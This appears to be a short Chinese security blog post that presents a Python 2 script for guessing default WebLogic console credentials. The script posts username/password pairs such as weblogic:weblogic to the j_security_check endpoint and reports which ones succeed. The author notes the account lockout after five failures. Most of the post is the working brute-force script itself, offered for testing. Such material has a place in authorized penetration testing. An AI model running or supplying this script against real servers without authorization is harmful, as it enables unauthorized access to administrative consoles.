WebLogic 默认端口7001 可以通过如下链接访问控制台 http://10.9.1.1:7001/console/login/LoginForm.jsp
写了一个简单的猜解脚本,半成品,做个记录。有时间拿出来继续完善。
测试版本:weblogic 12c /weblogic 9.2
测试成功截图,每个账号测试5个密码,若失败,账号锁定10分钟左右,暂时拿来测试默认密码用。
Python脚本:
#coding=utf-8
import requests
import time
names=['weblogic','system','portaladmin','guest'] #默认的缺省账号密码
passwds=['weblogic','system','portaladmin','guest']
data={}
for name in names:
name=name.rstrip()
for passwd in passwds:
passwd=passwd.rstrip()
data = {'j_username':name,'j_password':passwd}
try:
url = "http://10.9.1.1:7001/console/j_security_check"
response = requests.post(url,data=data,timeout=5)
result=response.content
if result.count('console.portal')!=0:
print '[success]' +name+':'+passwd
break
else:
print '[faile]'+name+':'+passwd
except:
print '[Error]'+name+':'+passwd
time.sleep(1)
关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。
